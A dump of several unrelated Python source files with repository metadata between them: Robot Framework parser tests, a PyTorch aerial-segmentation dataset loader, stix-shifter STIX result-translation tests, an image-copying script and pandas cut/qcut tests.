header=SectionHeader([
Token('SETTING HEADER', '*** Settings ***', 2, 0)
]),
body=[
Error([Token('ERROR', 'Invalid', 3, 0, inv_setting)]),
Documentation([Token('DOCUMENTATION', 'Documentation', 4, 0)])
]
)
])
assert_model(model, expected)
def test_model_error_with_fatal_error(self):
model = get_resource_model('''\
*** Test Cases ***
''', data_only=True)
inv_testcases = "Resource file with 'Test Cases' section is invalid."
expected = File([
CommentSection(
body=[
Error([Token('FATAL ERROR', '*** Test Cases ***', 1, 0, inv_testcases)])
]
)
])
assert_model(model, expected)
def test_model_error_with_error_and_fatal_error(self):
model = get_resource_model('''\
*** Invalid ***
*** Settings ***
Invalid
Documentation
*** Test Cases ***
''', data_only=True)
inv_header = (
"Unrecognized section header '*** Invalid ***'. Valid sections: "
"'Settings', 'Variables', 'Keywords' and 'Comments'."
)
inv_setting = "Non-existing setting 'Invalid'."
inv_testcases = "Resource file with 'Test Cases' section is invalid."
expected = File([
CommentSection(
body=[
Error([Token('ERROR', '*** Invalid ***', 1, 0, inv_header)])
]
),
SettingSection(
header=SectionHeader([
Token('SETTING HEADER', '*** Settings ***', 2, 0)
]),
body=[
Error([Token('ERROR', 'Invalid', 3, 0, inv_setting)]),
Documentation([Token('DOCUMENTATION', 'Documentation', 4, 0)]),
Error([Token('FATAL ERROR', '*** Test Cases ***', 5, 0, inv_testcases)])
]
)
])
assert_model(model, expected)
def test_set_errors_explicitly(self):
error = Error([])
error.errors = ('explicitly set', 'errors')
assert_equal(error.errors, ('explicitly set', 'errors'))
error.tokens = [Token('ERROR', error='normal error'),
Token('FATAL ERROR', error='fatal error')]
assert_equal(error.errors, ('normal error', 'fatal error',
'explicitly set', 'errors'))
error.errors = ['errors', 'as', 'list']
assert_equal(error.errors, ('normal error', 'fatal error',
'errors', 'as', 'list'))
class TestModelVisitors(unittest.TestCase):
def test_ast_NodeVisitor(self):
class Visitor(ast.NodeVisitor):
def __init__(self):
self.test_names = []
self.kw_names = []
def visit_TestCaseName(self, node):
self.test_names.append(node.name)
def visit_KeywordName(self, node):
self.kw_names.append(node.name)
def visit_Block(self, node):
raise RuntimeError('Should not be executed.')
def visit_Statement(self, node):
raise RuntimeError('Should not be executed.')
visitor = Visitor()
visitor.visit(get_model(DATA))
assert_equal(visitor.test_names, ['Example'])
assert_equal(visitor.kw_names, ['Keyword'])
def test_ModelVisitor(self):
class Visitor(ModelVisitor):
def __init__(self):
self.test_names = []
self.kw_names = []
self.blocks = []
self.statements = []
def visit_TestCaseName(self, node):
self.test_names.append(node.name)
self.visit_Statement(node)
def visit_KeywordName(self, node):
self.kw_names.append(node.name)
self.visit_Statement(node)
def visit_Block(self, node):
self.blocks.append(type(node).__name__)
self.generic_visit(node)
def visit_Statement(self, node):
self.statements.append(node.type)
visitor = Visitor()
visitor.visit(get_model(DATA))
assert_equal(visitor.test_names, ['Example'])
assert_equal(visitor.kw_names, ['Keyword'])
assert_equal(visitor.blocks,
['File', 'CommentSection', 'TestCaseSection', 'TestCase',
'KeywordSection', 'Keyword'])
assert_equal(visitor.statements,
['EOL', 'TESTCASE HEADER', 'EOL', 'TESTCASE NAME',
'COMMENT', 'KEYWORD', 'EOL', 'EOL', 'KEYWORD HEADER',
'COMMENT', 'KEYWORD NAME', 'ARGUMENTS', 'KEYWORD',
'RETURN STATEMENT'])
def test_ast_NodeTransformer(self):
class Transformer(ast.NodeTransformer):
def visit_Tags(self, node):
return None
def visit_TestCaseSection(self, node):
self.generic_visit(node)
node.body.append(
TestCase(TestCaseName([Token('TESTCASE NAME', 'Added'),
Token('EOL', '\n')]))
)
return node
def visit_TestCase(self, node):
self.generic_visit(node)
return node if node.name != 'REMOVE' else None
def visit_TestCaseName(self, node):
name_token = node.get_token(Token.TESTCASE_NAME)
name_token.value = name_token.value.upper()
return node
def visit_Block(self, node):
raise RuntimeError('Should not be executed.')
def visit_Statement(self, node):
raise RuntimeError('Should not be executed.')
model = get_model('''\
*** Test Cases ***
Example
[Tags] to be removed
Remove
''')
Transformer().visit(model)
expected = File(sections=[
TestCaseSection(
header=SectionHeader([
Token('TESTCASE HEADER', '*** Test Cases ***', 1, 0),
Token('EOL', '\n', 1, 18)
]),
body=[
TestCase(TestCaseName([
Token('TESTCASE NAME', 'EXAMPLE', 2, 0),
Token('EOL', '\n', 2, 7)
])),
TestCase(TestCaseName([
Token('TESTCASE NAME', 'Added'),
Token('EOL', '\n')
]))
]
)
])
assert_model(model, expected)
def test_ModelTransformer(self):
class Transformer(ModelTransformer):
def visit_SectionHeader(self, node):
return node
def visit_TestCaseName(self, node):
return node
def visit_Statement(self, node):
return None
def visit_Block(self, node):
self.generic_visit(node)
if hasattr(node, 'header'):
for token in node.header.data_tokens:
token.value = token.value.upper()
return node
model = get_model('''\
*** Test Cases ***
Example
[Tags] to be removed
To be removed
''')
Transformer().visit(model)
expected = File(sections=[
TestCaseSection(
header=SectionHeader([
Token('TESTCASE HEADER', '*** TEST CASES ***', 1, 0),
Token('EOL', '\n', 1, 18)
]),
body=[
TestCase(TestCaseName([
Token('TESTCASE NAME', 'EXAMPLE', 2, 0),
Token('EOL', '\n', 2, 7)
])),
]
)
])
assert_model(model, expected)
if __name__ == '__main__':
unittest.main()
| 35.728027
| 104
| 0.446203
|
4a0215edc6965fd1142bed1a86ecdc21b342314e
| 3,119
|
py
|
Python
|
src/models/data_factory.py
|
vinodrajendran001/aerial_segmentation
|
44ce909fe1f6f218930c50825ce7452c8029b20f
|
[
"FTL"
] | null | null | null |
src/models/data_factory.py
|
vinodrajendran001/aerial_segmentation
|
44ce909fe1f6f218930c50825ce7452c8029b20f
|
[
"FTL"
] | 10
|
2021-03-30T14:17:16.000Z
|
2022-03-12T00:50:30.000Z
|
src/models/data_factory.py
|
vinodrajendran001/aerial_segmentation
|
44ce909fe1f6f218930c50825ce7452c8029b20f
|
[
"FTL"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import numpy as np
from torch.utils.data import Dataset
from skimage import transform as sk_transform
from skimage.io import imread
import os
from glob import glob
class Dataset(Dataset):
def __init__(self, split_file_image, split_file_label, using_onehot):
self.split_file_image = sorted(glob(split_file_image + "/*.png"))
self.split_file_label = sorted(glob(split_file_label + "/*.png"))
self.using_onehot = using_onehot
def __len__(self):
return len(self.split_file_image)
def __getitem__(self, idx):
# Reading aerial image
img_name = self.split_file_image[idx]
image_single = imread(img_name)/ 255.0
label_name = self.split_file_label[idx]
label_single = imread(label_name)
# splitting label
# Converting labels to one-hot
label_one_hot = 0.0 * image_single
# building channel 0
label_one_hot[:, :, 0] = 1 * (
np.logical_and(np.equal(label_single[:, :, 0], 255), np.equal(label_single[:, :, 2], 0)))
# road channel 1
label_one_hot[:, :, 1] = 1 * (
np.logical_and(np.equal(label_single[:, :, 0], 0), np.equal(label_single[:, :, 2], 255)))
# background, channel 2
label_one_hot[:, :, 2] = 1 * (
np.logical_and(np.equal(label_single[:, :, 0], 255), np.equal(label_single[:, :, 1], 255)))
label_one_hot[:, :, 2] = 1 * np.logical_and(label_one_hot[:, :, 2], np.equal(label_single[:, :, 2], 255))
'''
# fixing some noisy, left-out pixels, assigning them to BG . These are the ones ==0 in all 3 channels
all_zeros = np.logical_and(np.equal(label_one_hot[:, :, 0], 0), np.equal(label_one_hot[:, :, 1], 0))
all_zeros = np.logical_and(all_zeros, np.equal(label_one_hot[:, :, 2], 0))
# add these noisy pixels to background
label_one_hot[:, :, 2] += 1 * all_zeros
'''
if not self.using_onehot:
label_one_hot = np.argmax(label_one_hot, 2)
return image_single, label_one_hot
def get_dataset(mode, config):
# Get dataset object by its name and mode (train/test)
# set data directory
data_folder = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
if mode == 'train':
split_file_image = os.path.join(data_folder, 'data', 'processed', mode, 'images')
split_file_label = os.path.join(data_folder, 'data', 'processed', mode, 'labels')
elif mode == 'test':
split_file_image = os.path.join(data_folder, 'data', 'processed', mode, 'images')
split_file_label = os.path.join(data_folder, 'data', 'processed', mode, 'labels')
else:
raise ValueError("Mode {} is unknown".format(mode))
ds = Dataset(split_file_image, split_file_label, using_onehot= False)
# preparing pytorch data loader
ds_final = torch.utils.data.DataLoader(ds, batch_size=config['train']['batch_size'], shuffle=config['train']['shuffle'], num_workers=config['train']['num_workers'])
return ds_final
| 35.443182
| 168
| 0.632895
|
4a02161285b197d286382d74ede48a738f6d153e
| 14,158
|
py
|
Python
|
tests/stix_translation/test_results_translation.py
|
priti-patil/stix-shifter
|
26954598fb79dde4506987388592ec391ff8a10b
|
[
"Apache-2.0"
] | 33
|
2018-05-25T17:07:28.000Z
|
2019-09-30T10:08:53.000Z
|
tests/stix_translation/test_results_translation.py
|
priti-patil/stix-shifter
|
26954598fb79dde4506987388592ec391ff8a10b
|
[
"Apache-2.0"
] | 54
|
2018-06-01T18:17:24.000Z
|
2019-09-30T18:36:15.000Z
|
tests/stix_translation/test_results_translation.py
|
subbyte/stix-shifter
|
36d71c172a5fc5b97d872e623753b0dd1bf4fe6c
|
[
"Apache-2.0"
] | 37
|
2018-07-24T13:29:46.000Z
|
2019-09-29T19:06:27.000Z
|
from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator
from stix_shifter_modules.mysql.entry_point import EntryPoint
from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers
import json
MODULE = 'mysql'
RESULTS = 'results'
TRANSFORMERS = get_module_transformers(MODULE)
EPOCH = 1634657528000
TIMESTAMP = "2021-10-19T15:32:08.000Z"
DATA_SOURCE = {
"type": "identity",
"id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3",
"name": "MySQL",
"identity_class": "events"
}
DATA = {
"source_ipaddr": "0.0.0.0",
"dest_ipaddr": "255.255.255.1",
"url": "https://example.com",
"username": "someuserid2018",
"protocol": 'tcp',
"source_port": 3000,
"dest_port": 2000,
"filename": "somefile.exe",
"sha256hash": "sha256_hash",
"md5hash": "md5_hash",
"file_path": "C:/some/path/",
"file_created_time": EPOCH,
"file_modified_time": EPOCH,
"file_accessed_time": EPOCH,
"directory_created_time": EPOCH,
"directory_modified_time": EPOCH,
"directory_accessed_time": EPOCH,
"process_id": 12345,
"process_name": "file executed",
"process_arguments": "some args",
"process_created_time": EPOCH
}
CYBOX_ID = {
"source-ipv4-addr": "ipv4-addr--0b6a89e3-e345-51b7-a8ee-aaff7ebf2df5",
"dest-ipv4-addr": "ipv4-addr--cb8e152d-60f0-596a-81e4-a22cc4a7f063",
"url": "url--8265905f-c609-52e3-ae52-6681bcd6086d",
"user-account": "user-account--3cd7ffc9-89f7-5b58-948c-117ec9b3e22a",
"network-traffic": "network-traffic--2ec70516-29b5-59f3-9743-3b93e97db6d8",
"file": "file--243f1b5f-0391-501c-bed0-17e9f204f1d2",
"directory": "directory--9ce39e76-d59e-5db2-8f0e-2001f689ea9d"
}
OPTIONS = {}
class TestTransform(object):
@staticmethod
def get_first(itr, constraint):
return next(
(obj for obj in itr if constraint(obj)),
None
)
@staticmethod
def get_first_of_type(itr, typ):
return TestTransform.get_first(itr, lambda o: type(o) == dict and o.get('type') == typ)
@staticmethod
def get_first_cybox_of_type_stix_2_1(itr, type):
for obj in itr:
if obj["type"] == type:
return obj
@staticmethod
def get_first_cybox_of_id_stix_2_1(itr, id):
for obj in itr:
if obj["id"] == id:
return obj
@staticmethod
def get_object_keys(objects):
for k, v in objects.items():
if k == 'type':
yield v
elif isinstance(v, dict):
for id_val in TestTransform.get_object_keys(v):
yield id_val
def test_common_prop(self):
DATA = {"entry_time": EPOCH, "entry_time": EPOCH, "eventcount": 1}
entry_point = EntryPoint()
result_bundle = entry_point.translate_results(json.dumps(DATA_SOURCE), json.dumps([DATA]))
assert result_bundle['type'] == 'bundle'
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == DATA_SOURCE['type']
assert result_bundle_identity['id'] == DATA_SOURCE['id']
assert result_bundle_identity['name'] == DATA_SOURCE['name']
assert result_bundle_identity['identity_class'] == DATA_SOURCE['identity_class']
observed_data = result_bundle_objects[1]
assert observed_data['id']
assert observed_data['type'] == "observed-data"
assert observed_data['created_by_ref'] == result_bundle_identity['id']
assert observed_data['number_observed'] == 1
assert observed_data['created']
assert observed_data['modified']
assert observed_data['first_observed']
assert observed_data['last_observed']
def test_STIX_2_0_cybox_observables(self):
entry_point = EntryPoint()
result_bundle = entry_point.translate_results(json.dumps(DATA_SOURCE), json.dumps([DATA]))
assert result_bundle['type'] == 'bundle'
assert "spec_version" in result_bundle
assert result_bundle['spec_version'] == '2.0'
result_bundle_objects = result_bundle['objects']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
# network-traffic
stix_object = TestTransform.get_first_of_type(objects.values(), 'network-traffic')
assert stix_object, 'network-traffic object type not found'
assert "src_ref" in stix_object
assert "dst_ref" in stix_object
assert "src_port" in stix_object and stix_object['src_port'] == 3000
assert "dst_port" in stix_object and stix_object['dst_port'] == 2000
assert "protocols" in stix_object and stix_object['protocols'] == ['tcp']
# destination ipv4-addr
ip_ref = stix_object['dst_ref']
assert ip_ref in objects, f"dst_ref with key {stix_object['dst_ref']} not found"
ip_obj = objects[ip_ref]
assert "type" in ip_obj and ip_obj['type'] == 'ipv4-addr'
assert "value" in ip_obj and ip_obj['value'] == DATA["dest_ipaddr"]
# source ipv4-addr
ip_ref = stix_object['src_ref']
assert ip_ref in objects, f"src_ref with key {stix_object['src_ref']} not found"
ip_obj = objects[ip_ref]
assert "type" in ip_obj and ip_obj['type'] == 'ipv4-addr'
assert "value" in ip_obj and ip_obj['value'] == DATA["source_ipaddr"]
# url
stix_object = TestTransform.get_first_of_type(objects.values(), 'url')
assert stix_object, 'url object type not found'
assert "value" in stix_object and stix_object['value'] == DATA['url']
# user-account
stix_object = TestTransform.get_first_of_type(objects.values(), 'user-account')
assert stix_object, 'user-account object type not found'
assert "user_id" in stix_object and stix_object['user_id'] == DATA['username']
# file
file_object = TestTransform.get_first_of_type(objects.values(), 'file')
assert file_object, 'file object type not found'
assert "name" in file_object and file_object['name'] == DATA['filename']
assert "created" in file_object and file_object['created'] == TIMESTAMP
assert "ctime" not in file_object
assert "modified" in file_object and file_object['modified'] == TIMESTAMP
assert "mtime" not in file_object
assert "accessed" in file_object and file_object['accessed'] == TIMESTAMP
assert "atime" not in file_object
assert "parent_directory_ref" in file_object
assert "hashes" in file_object
hashes = file_object["hashes"]
assert "MD5" in hashes and hashes["MD5"] == DATA["md5hash"]
assert "SHA-256" in hashes and hashes["SHA-256"] == DATA["sha256hash"]
directory_ref = file_object['parent_directory_ref']
assert directory_ref in objects, f"dst_ref with key {file_object['parent_directory_ref']} not found"
# directory
directory_object = TestTransform.get_first_of_type(objects.values(), 'directory')
assert directory_object, 'directory object type not found'
assert "path" in directory_object and directory_object["path"] == DATA["file_path"]
assert "created" in directory_object and directory_object['created'] == TIMESTAMP
assert "ctime" not in directory_object
assert "modified" in directory_object and directory_object['modified'] == TIMESTAMP
assert "mtime" not in directory_object
assert "accessed" in directory_object and directory_object['accessed'] == TIMESTAMP
assert "atime" not in directory_object
# process
process_object = TestTransform.get_first_of_type(objects.values(), 'process')
assert process_object, 'process object type not found'
assert "name" in process_object and process_object['name'] == DATA['process_name']
assert "pid" in process_object and process_object['pid'] == DATA['process_id']
assert "arguments" in process_object and process_object['arguments'] == DATA['process_arguments']
assert "created" in process_object and process_object['created'] == TIMESTAMP
assert "binary_ref" in process_object
assert "image_ref" not in process_object
def test_STIX_2_1_cybox_observables(self):
options = {
"stix_2.1": True
}
entry_point = EntryPoint(options=options)
result_bundle = entry_point.translate_results(json.dumps(DATA_SOURCE), json.dumps([DATA]))
assert result_bundle['type'] == 'bundle'
assert "spec_version" not in result_bundle
result_bundle_objects = result_bundle['objects']
observed_data = result_bundle_objects[1]
assert 'objects' not in observed_data
# network-traffic
network_traffic_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'network-traffic')
assert network_traffic_object, 'network-traffic object type not found'
assert "src_ref" in network_traffic_object
assert "dst_ref" in network_traffic_object
assert "src_port" in network_traffic_object and network_traffic_object['src_port'] == 3000
assert "dst_port" in network_traffic_object and network_traffic_object['dst_port'] == 2000
assert "protocols" in network_traffic_object and network_traffic_object['protocols'] == ['tcp']
assert "id" in network_traffic_object and str(network_traffic_object['id']) == CYBOX_ID["network-traffic"]
# destination ipv4-addr
destination_ipv4_object = TestTransform.get_first_cybox_of_id_stix_2_1(result_bundle_objects, network_traffic_object["dst_ref"])
assert "type" in destination_ipv4_object and destination_ipv4_object['type'] == 'ipv4-addr'
assert "value" in destination_ipv4_object and destination_ipv4_object['value'] == DATA["dest_ipaddr"]
assert "id" in destination_ipv4_object and str(destination_ipv4_object['id']) == CYBOX_ID["dest-ipv4-addr"]
# source ipv4-addr
source_ipv4_object = TestTransform.get_first_cybox_of_id_stix_2_1(result_bundle_objects, network_traffic_object["src_ref"])
assert "type" in source_ipv4_object and source_ipv4_object['type'] == 'ipv4-addr'
assert "value" in source_ipv4_object and source_ipv4_object['value'] == DATA["source_ipaddr"]
assert "id" in source_ipv4_object and str(source_ipv4_object['id']) == CYBOX_ID["source-ipv4-addr"]
# url
url_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'url')
assert url_object, 'url object type not found'
assert "value" in url_object and url_object['value'] == DATA['url']
assert "id" in url_object and str(url_object['id']) == CYBOX_ID["url"]
# user-account
user_account_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'user-account')
assert user_account_object, 'user-account object type not found'
assert "user_id" in user_account_object and user_account_object['user_id'] == DATA['username']
assert "id" in user_account_object and str(user_account_object['id']) == CYBOX_ID["user-account"]
# file
file_object = TestTransform.get_first_cybox_of_type_stix_2_1(result_bundle_objects, 'file')
assert file_object, 'file object type not found'
assert "name" in file_object and file_object['name'] == DATA['filename']
assert "ctime" in file_object and file_object['ctime'] == TIMESTAMP
assert "created" not in file_object
assert "mtime" in file_object and file_object['mtime'] == TIMESTAMP
assert "modified" not in file_object
assert "atime" in file_object and file_object['atime'] == TIMESTAMP
assert "accessed" not in file_object
assert "parent_directory_ref" in file_object
assert "hashes" in file_object
hashes = file_object["hashes"]
assert "MD5" in hashes and hashes["MD5"] == DATA["md5hash"]
assert "SHA-256" in hashes and hashes["SHA-256"] == DATA["sha256hash"]
assert "parent_directory_ref" in file_object
assert "id" in file_object and str(file_object['id']) == CYBOX_ID["file"]
# directory
directory_object = TestTransform.get_first_cybox_of_id_stix_2_1(result_bundle_objects, file_object["parent_directory_ref"])
assert directory_object, 'directory object type not found'
assert "path" in directory_object and directory_object["path"] == DATA["file_path"]
assert "ctime" in directory_object and directory_object['ctime'] == TIMESTAMP
assert "created" not in directory_object
assert "mtime" in directory_object and directory_object['mtime'] == TIMESTAMP
assert "modified" not in directory_object
assert "atime" in directory_object and directory_object['atime'] == TIMESTAMP
assert "accessed" not in directory_object
# process
process_object = TestTransform.get_first_of_type(result_bundle_objects, 'process')
assert process_object, 'process object type not found'
assert "name" not in process_object
assert "pid" in process_object and process_object['pid'] == DATA['process_id']
assert "arguments" in process_object and process_object['pid'] == DATA['process_id']
assert "created_time" in process_object and process_object['arguments'] == DATA['process_arguments']
assert "created" not in process_object
assert "image_ref" in process_object
assert "binary_ref" not in process_object
assert "id" in directory_object and str(directory_object['id']) == CYBOX_ID["directory"]
| 47.99322
| 136
| 0.670646
|
4a02173eb57545ab3b16c691d67beb7894399305
| 1,438
|
py
|
Python
|
scripts/sequential_tool.py
|
ripl-ttic/dense_visual_descriptors
|
64bd1eb40aa7be047fa2a4fa0d3973d4c4e42ca8
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/sequential_tool.py
|
ripl-ttic/dense_visual_descriptors
|
64bd1eb40aa7be047fa2a4fa0d3973d4c4e42ca8
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/sequential_tool.py
|
ripl-ttic/dense_visual_descriptors
|
64bd1eb40aa7be047fa2a4fa0d3973d4c4e42ca8
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import shutil
input_dir = "/media/kudo/Elements/data/pdc/logs_proto"
output_dir = "/media/kudo/Elements/data/sequential_pdc/logs_proto"
d = input_dir
count = 0
folders = [os.path.join(d, o) for o in os.listdir(d) if os.path.isdir(os.path.join(d,o))]
for folder_i, folder in enumerate(folders):
num_folders = len(folders)
print("working on {}/{} scene".format(folder_i+1,num_folders))
image_dir = os.path.join(folder, "processed", "images")
rel_path = os.path.relpath(image_dir, input_dir)
output_image_dir = os.path.join(output_dir, rel_path)
if not os.path.exists(output_image_dir):
os.makedirs(output_image_dir)
rgb_lst = [filename for filename in os.listdir(image_dir) if filename.split('.')[0][-3:]=='rgb']
for idx, image_file in enumerate(rgb_lst):
[image_name,image_ext] = image_file.split('.')
src = os.path.join(image_dir, image_file)
dest = os.path.join(output_image_dir, "{:d}".format(idx).zfill(6) + '.' + image_ext)
shutil.copyfile(src, dest)
count += 1
# copy yamls
src = os.path.join(image_dir, "camera_info.yaml")
dest = os.path.join(output_image_dir, "camera_info.yaml")
shutil.copyfile(src, dest)
src = os.path.join(image_dir, "pose_data.yaml")
dest = os.path.join(output_image_dir, "pose_data.yaml")
shutil.copyfile(src, dest)
print("The total number of rgb images copied is {}".format(count))
| 36.871795
| 100
| 0.684979
|
4a0218bef60013ce56a78a1dd1bed1af0b8e944b
| 8,863
|
py
|
Python
|
pandas/tools/tests/test_tile.py
|
certik/pandas
|
758ca05e2eb04532b5d78331ba87c291038e2c61
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 29
|
2015-01-08T19:20:37.000Z
|
2021-04-20T08:25:56.000Z
|
pandas/tools/tests/test_tile.py
|
certik/pandas
|
758ca05e2eb04532b5d78331ba87c291038e2c61
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 5
|
2021-03-19T08:36:48.000Z
|
2022-01-13T01:52:34.000Z
|
pandas/tools/tests/test_tile.py
|
certik/pandas
|
758ca05e2eb04532b5d78331ba87c291038e2c61
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 17
|
2015-02-01T18:12:04.000Z
|
2020-06-15T14:13:04.000Z
|
import os
import nose
import numpy as np
from pandas.compat import zip
from pandas import DataFrame, Series, unique
import pandas.util.testing as tm
from pandas.util.testing import assertRaisesRegexp
import pandas.core.common as com
from pandas.core.algorithms import quantile
from pandas.tools.tile import cut, qcut
import pandas.tools.tile as tmod
from numpy.testing import assert_equal, assert_almost_equal
class TestCut(tm.TestCase):
def test_simple(self):
data = np.ones(5)
result = cut(data, 4, labels=False)
desired = [1, 1, 1, 1, 1]
assert_equal(result, desired)
def test_bins(self):
data = np.array([.2, 1.4, 2.5, 6.2, 9.7, 2.1])
result, bins = cut(data, 3, retbins=True)
assert_equal(result.codes, [0, 0, 0, 1, 2, 0])
assert_almost_equal(bins, [0.1905, 3.36666667, 6.53333333, 9.7])
def test_right(self):
data = np.array([.2, 1.4, 2.5, 6.2, 9.7, 2.1, 2.575])
result, bins = cut(data, 4, right=True, retbins=True)
assert_equal(result.codes, [0, 0, 0, 2, 3, 0, 0])
assert_almost_equal(bins, [0.1905, 2.575, 4.95, 7.325, 9.7])
def test_noright(self):
data = np.array([.2, 1.4, 2.5, 6.2, 9.7, 2.1, 2.575])
result, bins = cut(data, 4, right=False, retbins=True)
assert_equal(result.codes, [0, 0, 0, 2, 3, 0, 1])
assert_almost_equal(bins, [0.2, 2.575, 4.95, 7.325, 9.7095])
def test_arraylike(self):
data = [.2, 1.4, 2.5, 6.2, 9.7, 2.1]
result, bins = cut(data, 3, retbins=True)
assert_equal(result.codes, [0, 0, 0, 1, 2, 0])
assert_almost_equal(bins, [0.1905, 3.36666667, 6.53333333, 9.7])
def test_bins_not_monotonic(self):
data = [.2, 1.4, 2.5, 6.2, 9.7, 2.1]
self.assertRaises(ValueError, cut, data, [0.1, 1.5, 1, 10])
def test_wrong_num_labels(self):
data = [.2, 1.4, 2.5, 6.2, 9.7, 2.1]
self.assertRaises(ValueError, cut, data, [0, 1, 10],
labels=['foo', 'bar', 'baz'])
def test_cut_corner(self):
# h3h
self.assertRaises(ValueError, cut, [], 2)
self.assertRaises(ValueError, cut, [1, 2, 3], 0.5)
def test_cut_out_of_range_more(self):
# #1511
s = Series([0, -1, 0, 1, -3])
ind = cut(s, [0, 1], labels=False)
exp = [np.nan, np.nan, np.nan, 0, np.nan]
assert_almost_equal(ind, exp)
def test_labels(self):
arr = np.tile(np.arange(0, 1.01, 0.1), 4)
result, bins = cut(arr, 4, retbins=True)
ex_levels = ['(-0.001, 0.25]', '(0.25, 0.5]', '(0.5, 0.75]',
'(0.75, 1]']
self.assert_numpy_array_equal(result.categories, ex_levels)
result, bins = cut(arr, 4, retbins=True, right=False)
ex_levels = ['[0, 0.25)', '[0.25, 0.5)', '[0.5, 0.75)',
'[0.75, 1.001)']
self.assert_numpy_array_equal(result.categories, ex_levels)
def test_cut_pass_series_name_to_factor(self):
s = Series(np.random.randn(100), name='foo')
factor = cut(s, 4)
self.assertEqual(factor.name, 'foo')
def test_label_precision(self):
arr = np.arange(0, 0.73, 0.01)
result = cut(arr, 4, precision=2)
ex_levels = ['(-0.00072, 0.18]', '(0.18, 0.36]', '(0.36, 0.54]',
'(0.54, 0.72]']
self.assert_numpy_array_equal(result.categories, ex_levels)
def test_na_handling(self):
arr = np.arange(0, 0.75, 0.01)
arr[::3] = np.nan
result = cut(arr, 4)
result_arr = np.asarray(result)
ex_arr = np.where(com.isnull(arr), np.nan, result_arr)
tm.assert_almost_equal(result_arr, ex_arr)
result = cut(arr, 4, labels=False)
ex_result = np.where(com.isnull(arr), np.nan, result)
tm.assert_almost_equal(result, ex_result)
def test_inf_handling(self):
data = np.arange(6)
data_ser = Series(data,dtype='int64')
result = cut(data, [-np.inf, 2, 4, np.inf])
result_ser = cut(data_ser, [-np.inf, 2, 4, np.inf])
ex_categories = ['(-inf, 2]', '(2, 4]', '(4, inf]']
np.testing.assert_array_equal(result.categories, ex_categories)
np.testing.assert_array_equal(result_ser.cat.categories, ex_categories)
self.assertEqual(result[5], '(4, inf]')
self.assertEqual(result[0], '(-inf, 2]')
self.assertEqual(result_ser[5], '(4, inf]')
self.assertEqual(result_ser[0], '(-inf, 2]')
def test_qcut(self):
arr = np.random.randn(1000)
labels, bins = qcut(arr, 4, retbins=True)
ex_bins = quantile(arr, [0, .25, .5, .75, 1.])
assert_almost_equal(bins, ex_bins)
ex_levels = cut(arr, ex_bins, include_lowest=True)
self.assert_numpy_array_equal(labels, ex_levels)
def test_qcut_bounds(self):
arr = np.random.randn(1000)
factor = qcut(arr, 10, labels=False)
self.assertEqual(len(np.unique(factor)), 10)
def test_qcut_specify_quantiles(self):
arr = np.random.randn(100)
factor = qcut(arr, [0, .25, .5, .75, 1.])
expected = qcut(arr, 4)
self.assertTrue(factor.equals(expected))
def test_qcut_all_bins_same(self):
assertRaisesRegexp(ValueError, "edges.*unique", qcut, [0,0,0,0,0,0,0,0,0,0], 3)
def test_cut_out_of_bounds(self):
arr = np.random.randn(100)
result = cut(arr, [-1, 0, 1])
mask = result.codes == -1
ex_mask = (arr < -1) | (arr > 1)
self.assert_numpy_array_equal(mask, ex_mask)
def test_cut_pass_labels(self):
arr = [50, 5, 10, 15, 20, 30, 70]
bins = [0, 25, 50, 100]
labels = ['Small', 'Medium', 'Large']
result = cut(arr, bins, labels=labels)
exp = cut(arr, bins)
exp.categories = labels
self.assertTrue(result.equals(exp))
def test_qcut_include_lowest(self):
values = np.arange(10)
cats = qcut(values, 4)
ex_levels = ['[0, 2.25]', '(2.25, 4.5]', '(4.5, 6.75]', '(6.75, 9]']
self.assertTrue((cats.categories == ex_levels).all())
def test_qcut_nas(self):
arr = np.random.randn(100)
arr[:20] = np.nan
result = qcut(arr, 4)
self.assertTrue(com.isnull(result[:20]).all())
def test_label_formatting(self):
self.assertEqual(tmod._trim_zeros('1.000'), '1')
# it works
result = cut(np.arange(11.), 2)
result = cut(np.arange(11.) / 1e10, 2)
# #1979, negative numbers
result = tmod._format_label(-117.9998, precision=3)
self.assertEqual(result, '-118')
result = tmod._format_label(117.9998, precision=3)
self.assertEqual(result, '118')
def test_qcut_binning_issues(self):
# #1978, 1979
path = os.path.join(curpath(), 'cut_data.csv')
arr = np.loadtxt(path)
result = qcut(arr, 20)
starts = []
ends = []
for lev in result.categories:
s, e = lev[1:-1].split(',')
self.assertTrue(s != e)
starts.append(float(s))
ends.append(float(e))
for (sp, sn), (ep, en) in zip(zip(starts[:-1], starts[1:]),
zip(ends[:-1], ends[1:])):
self.assertTrue(sp < sn)
self.assertTrue(ep < en)
self.assertTrue(ep <= sn)
def test_cut_return_categorical(self):
from pandas import Categorical
s = Series([0,1,2,3,4,5,6,7,8])
res = cut(s,3)
exp = Series(Categorical.from_codes([0,0,0,1,1,1,2,2,2],
["(-0.008, 2.667]", "(2.667, 5.333]", "(5.333, 8]"],
ordered=True))
tm.assert_series_equal(res, exp)
def test_qcut_return_categorical(self):
from pandas import Categorical
s = Series([0,1,2,3,4,5,6,7,8])
res = qcut(s,[0,0.333,0.666,1])
exp = Series(Categorical.from_codes([0,0,0,1,1,1,2,2,2],
["[0, 2.664]", "(2.664, 5.328]", "(5.328, 8]"],
ordered=True))
tm.assert_series_equal(res, exp)
def test_series_retbins(self):
# GH 8589
s = Series(np.arange(4))
result, bins = cut(s, 2, retbins=True)
assert_equal(result.cat.codes.values, [0, 0, 1, 1])
assert_almost_equal(bins, [-0.003, 1.5, 3])
